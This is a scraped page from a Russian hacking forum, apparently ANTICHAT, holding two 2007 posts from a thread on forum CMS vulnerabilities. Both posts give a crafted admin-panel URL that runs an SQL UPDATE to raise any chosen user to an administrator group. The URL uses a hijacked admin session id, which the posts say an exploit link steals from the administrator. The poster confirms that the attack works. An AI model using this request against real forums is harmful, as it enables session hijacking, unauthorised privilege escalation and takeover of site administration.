HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 15.08.2007, 01:51
FaR-G9
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
С нами: 10207557

Репутация: 64
По умолчанию

Цитата:
Сообщение от Basurman  
/admin/index.php?adsess=(тут id админской сессии)&act=sql&code=runsql&section=admin&qu ery=UPDATE+(тут префикс базы)members+SET
+mgroup+%3D+%27(тут номер группы до которой поднимать)%27+WHERE+id+%3D+%27(здесь id юзера, которого хотим повысить)%27&st=

Проблема в том, что нет админской сессии. Если достанешь - можешь вручную делать много чего
Чтобы достать админскую сессию и написан данный сплоит в виде ссылки, попадая на которую администратор "палит" свою сессию
Я пробовал на локалхосте, админская сесия была
но че-то сплойт не сработал
 

  #22  
Старый 17.08.2007, 02:04
FaR-G9
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
С нами: 10207557

Репутация: 64
По умолчанию

Код:
/admin/index.php?adsess=(тут id админской сессии)&act=sql&code=runsql&section=admin&query=UPDATE+(тут префикс базы)members+SET 
+mgroup+%3D+%27(тут номер группы до которой поднимать)%27+WHERE+id+%3D+%27(здесь id юзера, которого хотим повысить)%27&st=
Вот, вот эта штука заработала, я понял ошибку в скрипте
Прошу тему закрыть
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ВОПРОС ЗНАТОКАМ Hrust Болталка 12 23.01.2005 19:31
Вопрос... Black_Death Болталка 1 05.01.2005 04:56



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.